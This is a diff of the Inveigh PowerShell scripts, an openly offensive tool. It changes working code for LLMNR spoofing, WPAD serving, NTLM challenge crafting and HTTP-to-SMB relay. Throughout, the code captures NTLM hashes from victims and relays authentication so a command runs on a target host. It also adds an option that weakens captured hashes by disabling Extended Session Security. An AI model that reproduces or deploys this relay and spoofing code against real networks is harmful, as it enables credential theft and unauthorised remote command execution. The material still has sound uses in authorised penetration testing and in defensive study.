+ if($NTLM_type -eq 'NTLMv2')
{
- $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
- $inveigh.SMB_relay_active_step = 4
- SMBRelayExecute $SMB_relay_socket $SMB_user_ID
+ $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")])
+ SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID
+ $relay_step = 0
}
else
{
- $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
- $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
- $inveigh.SMB_relay_active_step = 0
+ $inveigh.console_queue.Add("NTLMv1 SMB relay not yet supported")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NTLMv1 relay not yet supported")])
$SMB_relay_socket.Close()
+ $relay_step = 0
}
}
else
{
- $inveigh.console_queue.Add("NTLMv1 SMB relay not yet supported")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NTLMv1 relay not yet supported")])
- $inveigh.SMB_relay_active_step = 0
+ $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")])
$SMB_relay_socket.Close()
+ $relay_step = 0
}
}
else
{
- $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")])
- $inveigh.SMB_relay_active_step = 0
+ $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_user_string appears to be a machine account")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")])
$SMB_relay_socket.Close()
+ $relay_step = 0
}
}
else
{
- $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_user_string appears to be a machine account")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")])
- $inveigh.SMB_relay_active_step = 0
+ $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on SMB relay username list")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")])
$SMB_relay_socket.Close()
+ $relay_step = 0
}
}
- else
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on SMB relay username list")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")])
- $inveigh.SMB_relay_active_step = 0
- $SMB_relay_socket.Close()
- }
}
+ else
+ {
+ $NTLM = "NTLM"
+ $HTTP_client_close = $false
+ }
+
+ }
+ else
+ {
+
+ if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
+ {
+ $HTTP_client_close = $true
+ }
+ else
+ {
+ $HTTP_client_close = $false
+ }
+
+ }
+
+ $HTTP_timestamp = Get-Date -format r
+ $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
+ $HTTP_message = ""
+
+ if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth)
+ {
+ $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
+ $HTTP_message_bytes = 0x0d,0x0a
+ $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
+ $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
+
+ $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+ $HTTP_response_status_code +
+ 0x20 +
+ $HTTP_response_phrase +
+ 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
+ 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
+ 0x0a,0x44,0x61,0x74,0x65,0x3a +
+ $HTTP_timestamp +
+ 0x0d,0x0a +
+ $HTTP_WWW_authenticate_header +
+ $NTLM +
+ 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
+ 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
+ 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
+ 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
+ $HTTP_content_length_bytes +
+ 0x0d,0x0a +
+ $HTTP_message_bytes
}
else
{
- $NTLM = 'NTLM'
+ $HTTP_response_status_code = 0x32,0x30,0x30
+ $HTTP_response_phrase = 0x4f,0x4b
+ $HTTP_message_bytes = 0x0d,0x0a
+ $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
+ $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
+
+ $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+ $HTTP_response_status_code +
+ 0x20 +
+ $HTTP_response_phrase +
+ 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
+ 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
+ 0x0a,0x44,0x61,0x74,0x65,0x3a +
+ $HTTP_timestamp +
+ 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
+ 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
+ 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
+ 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
+ $HTTP_content_length_bytes +
+ 0x0d,0x0a +
+ $HTTP_message_bytes
}
+ $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
+ $HTTP_stream.Flush()
+ Start-Sleep -m 10
+ $HTTP_request_raw_URL_old = $HTTP_request_raw_URL
+ $HTTP_client_handle_old = $HTTP_client.Client.Handle
+
+ if($HTTP_client_close)
+ {
+ $HTTP_client.Close()
+ }
+
}
-
- [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
- $inveigh.response.ContentLength64 = $HTTP_buffer.Length
- $inveigh.response.AddHeader("WWW-Authenticate",$NTLM)
- $HTTP_stream = $inveigh.response.OutputStream
- $HTTP_stream.Write($HTTP_buffer,0,$HTTP_buffer.Length)
- $HTTP_stream.close()
+ else
+ {
+ $HTTP_client.Close()
+ $HTTP_client_close = $true
+ }
+
}
- $inveigh.HTTP_listener.Stop()
- $inveigh.HTTP_listener.Close()
+ $HTTP_client.Close()
+ start-sleep -s 1
+ $HTTP_listener.Server.blocking = $false
+ Start-Sleep -s 1
+ $HTTP_listener.Server.Close()
+ Start-Sleep -s 1
+ $HTTP_listener.Stop()
}
$control_relay_scriptblock =
@@ -1489,13 +2847,12 @@ $control_relay_scriptblock =
if($inveigh.HTTPS)
{
- & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
try
{
$certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
$certificate_store.Open('ReadWrite')
- $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0]
+ $certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
$certificate_store.Remove($certificate)
$certificate_store.Close()
}
@@ -1558,39 +2915,52 @@ $control_relay_scriptblock =
}
-# HTTP/HTTPS Listener Startup function
+# HTTP Listener Startup function
function HTTPListener()
{
- $inveigh.HTTP_listener = New-Object System.Net.HttpListener
-
- if($inveigh.HTTP)
- {
- $inveigh.HTTP_listener.Prefixes.Add('http://*:80/')
- }
-
- if($inveigh.HTTPS)
- {
- $inveigh.HTTP_listener.Prefixes.Add('https://*:443/')
- }
-
- $inveigh.HTTP_listener.AuthenticationSchemes = "Anonymous"
- $inveigh.HTTP_listener.Start()
+ $SSL = $False
$HTTP_runspace = [RunspaceFactory]::CreateRunspace()
$HTTP_runspace.Open()
$HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$HTTP_powershell = [PowerShell]::Create()
$HTTP_powershell.Runspace = $HTTP_runspace
$HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $HTTP_powershell.AddScript($irkin_functions_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument(
- $SMBRelayTarget).AddArgument($SMBRelayCommand).AddArgument($SMBRelayUsernames).AddArgument(
- $SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument($WPADAuth) > $null
+ $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPIP).AddArgument(
+ $HTTPPort).AddArgument($Target).AddArgument($Command).AddArgument($Usernames).AddArgument(
+ $RelayAutoDisable).AddArgument($WPADAuth).AddArgument($SSL).AddArgument($certificate).AddArgument(
+ $SMB_version).AddArgument($Service) > $null
$HTTP_powershell.BeginInvoke() > $null
}
+Start-Sleep -m 50
+
+# HTTPS Listener Startup function
+function HTTPSListener()
+{
+ $SSL = $True
+ $HTTPS_runspace = [RunspaceFactory]::CreateRunspace()
+ $HTTPS_runspace.Open()
+ $HTTPS_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $HTTPS_powershell = [PowerShell]::Create()
+ $HTTPS_powershell.Runspace = $HTTPS_runspace
+ $HTTPS_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($irkin_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
+ $HTTPS_powershell.AddScript($SMB_relay_response_scriptblock) > $null
+ $HTTPS_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
+ $HTTPS_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPIP).AddArgument(
+ $HTTPSPort).AddArgument($Target).AddArgument($Command).AddArgument($Usernames).AddArgument(
+ $RelayAutoDisable).AddArgument($WPADAuth).AddArgument($SSL).AddArgument($certificate).AddArgument(
+ $SMB_version).AddArgument($Service) > $null
+ $HTTPS_powershell.BeginInvoke() > $null
+}
+
# Control Relay Startup function
function ControlRelayLoop()
{
@@ -1605,11 +2975,17 @@ function ControlRelayLoop()
}
# HTTP Server Start
-if($inveigh.HTTP -or $inveigh.HTTPS)
+if($HTTP -eq 'Y')
{
HTTPListener
}
+# HTTPS Server Start
+if($HTTPS -eq 'Y')
+{
+ HTTPSListener
+}
+
# Control Relay Loop Start
if($RunTime -or $inveigh.file_output)
{
@@ -1718,7 +3094,7 @@ if($inveigh)
if($inveigh.unprivileged_running)
{
$inveigh.unprivileged_running = $false
- Start-Sleep -s 5
+ Start-Sleep -S 2
Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
@@ -1732,6 +3108,7 @@ if($inveigh)
if($inveigh.relay_running)
{
$inveigh.relay_running = $false
+ Start-Sleep -S 2
Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
@@ -1763,27 +3140,45 @@ if($inveigh)
if($inveigh.HTTPS)
{
- & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+ $certificate_check = & "netsh" http show sslcert
- try
+ if($certificate_check)
{
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
- $certificate_store.Remove($certificate)
- $certificate_store.Close()
+ $netsh_ipport = "ipport=" + $inveigh.HTTPS_IP + ":" + $inveigh.HTTPS_port
+ $netsh_arguments = @("http","delete","sslcert",$netsh_ipport)
+ & "netsh" $netsh_arguments > $null
}
- catch
+
+ if(!$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- if($inveigh.file_output)
+ try
{
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
+
+ ForEach($certificate in $certificates)
+ {
+ $certificate_store.Remove($certificate)
+ }
+
+ $certificate_store.Close()
+ }
+ catch
+ {
+ Write-Output("SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
+
+ if($inveigh.file_output)
+ {
+ "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ }
+
}
}
+
}
$inveigh.HTTP = $false
diff --git a/Scripts/Inveigh-Unprivileged.ps1 b/Scripts/Inveigh-Unprivileged.ps1
index b4c0c25..3fe5dd7 100644
--- a/Scripts/Inveigh-Unprivileged.ps1
+++ b/Scripts/Inveigh-Unprivileged.ps1
@@ -79,10 +79,8 @@ Default = Any: IP address for the HTTP listener.
Default = 80: TCP port for the HTTP listener.
.PARAMETER HTTPAuth
-Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to
-wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A
-WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and
-connecting to the root of the HTTP listener.
+Default = NTLMESS: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not apply to
+wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
.PARAMETER HTTPBasicRealm
Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
@@ -92,8 +90,8 @@ String or HTML to serve as the default HTTP/HTTPS response. This response will n
Use PowerShell character escapes where necessary.
.PARAMETER WPADAuth
-Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
-Anonymous can prevent browser login prompts.
+Default = NTLMESS: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
.PARAMETER WPADEmptyFile
Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
@@ -160,6 +158,9 @@ Default = Unlimited: (Integer) Run time duration in minutes.
.PARAMETER RunCount
Default = Unlimited: (Integer) Number of captures to perform before auto-exiting.
+.PARAMETER StartupChecks
+Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+
.PARAMETER ShowHelp
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
@@ -201,11 +202,12 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
[parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$HTTPAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$WPADAuth = "NTLM",
[parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"),
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
@@ -233,7 +235,8 @@ param
if ($invalid_parameter)
{
- throw "$($invalid_parameter) is not a valid parameter."
+ Write-Output "Error:$($invalid_parameter) is not a valid parameter"
+ throw
}
if($NBNSBruteForce -eq 'Y')
@@ -244,7 +247,8 @@ if($NBNSBruteForce -eq 'Y')
if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget)
{
- throw "You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce"
+ Write-Output "Error:You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce"
+ throw
}
if(!$SpooferIP)
@@ -257,12 +261,14 @@ if($WPADIP -or $WPADPort)
if(!$WPADIP)
{
- throw "You must specify a -WPADPort to go with -WPADIP"
+ Write-Output "Error:You must specify a -WPADPort to go with -WPADIP"
+ throw
}
if(!$WPADPort)
{
- throw "You must specify a -WPADIP to go with -WPADPort"
+ Write-Output "Error:You must specify a -WPADIP to go with -WPADPort"
+ throw
}
}
@@ -292,7 +298,8 @@ if(!$inveigh)
if($inveigh.unprivileged_running)
{
- throw "Invoke-InveighUnprivileged is already running, use Stop-Inveigh"
+ Write-Output "Error:Invoke-InveighUnprivileged is already running, use Stop-Inveigh"
+ throw
}
if(!$inveigh.running -or !$inveigh.relay_running)
@@ -304,11 +311,11 @@ if(!$inveigh.running -or !$inveigh.relay_running)
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
- $inveigh.certificate_application_ID = $HTTPSCertAppID
- $inveigh.certificate_thumbprint = $HTTPSCertThumbprint
$inveigh.console_output = $false
$inveigh.console_input = $true
$inveigh.file_output = $false
+ $inveigh.HTTPS_existing_certificate = $false
+ $inveigh.HTTPS_force_certificate_delete = $false
$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
@@ -362,7 +369,10 @@ else
$inveigh.status_queue.Add("Inveigh Unprivileged started at $(Get-Date -format 's')") > $null
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Unprivileged started")]) > $null
-$firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+if($StartupChecks -eq 'Y')
+{
+ $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+}
if($firewall_status)
{
@@ -380,7 +390,10 @@ if($firewall_status)
if($LLMNR -eq 'Y')
{
- $LLMNR_port_check = netstat -anp UDP | findstr 0.0.0.0:5355
+ if($StartupChecks -eq 'Y')
+ {
+ $LLMNR_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5355 "
+ }
if(!$LLMNR_port_check)
{
@@ -475,11 +488,10 @@ else
if($HTTP -eq 'Y')
{
- $HTTP_port_check += netstat -anp TCP | findstr 0.0.0.0:$HTTPPort
- if($HTTPIP)
+ if($StartupChecks -eq 'Y')
{
- $HTTP_port_check += netstat -anp TCP | findstr $HTTPIP`:$HTTPPort
+ $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort "
}
if($HTTP_port_check)
@@ -490,7 +502,7 @@ if($HTTP -eq 'Y')
else
{
- if($HTTPIP)
+ if($HTTPIP -ne '0.0.0.0')
{
$inveigh.status_queue.Add("HTTP IP Address = $HTTPIP") > $null
}
@@ -730,7 +742,7 @@ $HTTP_scriptblock =
function NTLMChallengeBase64
{
- param ([String]$Challenge)
+ param ([String]$Challenge,[Bool]$NTLMESS)
$HTTP_timestamp = Get-Date
$HTTP_timestamp = $HTTP_timestamp.ToFileTime()
@@ -752,8 +764,18 @@ $HTTP_scriptblock =
$inveigh.HTTP_challenge_queue.Add($HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null
+ if($NTLMESS)
+ {
+ $HTTP_NTLM_negotiation_flags = 0x05,0x82,0x89,0x0a
+ }
+ else
+ {
+ $HTTP_NTLM_negotiation_flags = 0x05,0x82,0x81,0x0a
+ }
+
$HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
- 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
+ 0x00,0x00,0x00 +
+ $HTTP_NTLM_negotiation_flags +
$HTTP_challenge_bytes +
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
@@ -774,7 +796,7 @@ $HTTP_scriptblock =
return $NTLM
}
- if($HTTPIP)
+ if($HTTPIP -ne '0.0.0.0')
{
$HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP)
$HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort)
@@ -784,8 +806,19 @@ $HTTP_scriptblock =
$HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
}
+ $HTTP_running = $true
$HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
- $HTTP_listener.Start()
+
+ try
+ {
+ $HTTP_listener.Start()
+ }
+ catch
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting HTTP listener")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting HTTP listener")])
+ $HTTP_running = $false
+ }
$HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # WWW-Authenticate
$run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count
@@ -822,7 +855,7 @@ $HTTP_scriptblock =
$HTTP_client_close = $true
- :HTTP_listener_loop while ($inveigh.unprivileged_running)
+ :HTTP_listener_loop while ($inveigh.unprivileged_running -and $HTTP_running)
{
$TCP_request = ""
$TCP_request_bytes = New-Object System.Byte[] 1024
@@ -890,6 +923,15 @@ $HTTP_scriptblock =
$HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
}
+ if(($HTTP_request_raw_url -match '/wpad.dat' -and $WPADAuth -eq 'NTLM') -or ($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'NTLM'))
+ {
+ $HTTPNTLMESS = $true
+ }
+ else
+ {
+ $HTTPNTLMESS = $false
+ }
+
$HTTP_type = "HTTP"
$NTLM = "NTLM"
$NTLM_auth = $false
@@ -910,7 +952,7 @@ $HTTP_scriptblock =
if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
{
$HTTP_response_status_code = 0x34,0x30,0x31
- $NTLM = NTLMChallengeBase64 $Challenge
+ $NTLM = NTLMChallengeBase64 $Challenge $HTTPNTLMESS
$HTTP_client_close = $false
}
elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
@@ -921,7 +963,7 @@ $HTTP_scriptblock =
$HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
$HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
[String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
- $HTTP_challenge_queue.Remove($NTLM_challenge)
+ $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
$NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
if($HTTP_NTLM_domain_length -eq 0)
@@ -1077,7 +1119,7 @@ $HTTP_scriptblock =
$HTTP_timestamp = Get-Date -format r
$HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
- if(($HTTPAuth -eq 'NTLM' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth)
+ if(($HTTPAuth -like 'NTLM*' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth)
{
$NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
$HTTP_message_bytes = 0x0d,0x0a
@@ -1199,14 +1241,27 @@ $LLMNR_spoofer_scriptblock =
{
param ($LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL)
+ $LLMNR_running = $true
$LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355)
- $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355
+
+ try
+ {
+ $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355
+ }
+ catch
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")])
+ $LLMNR_running = $false
+ }
+
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
$LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
$LLMNR_UDP_client.Client.ReceiveTimeout = 5000
- while($inveigh.unprivileged_running)
+ while($inveigh.unprivileged_running -and $LLMNR_running)
{
+
$LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint) # need to switch to async
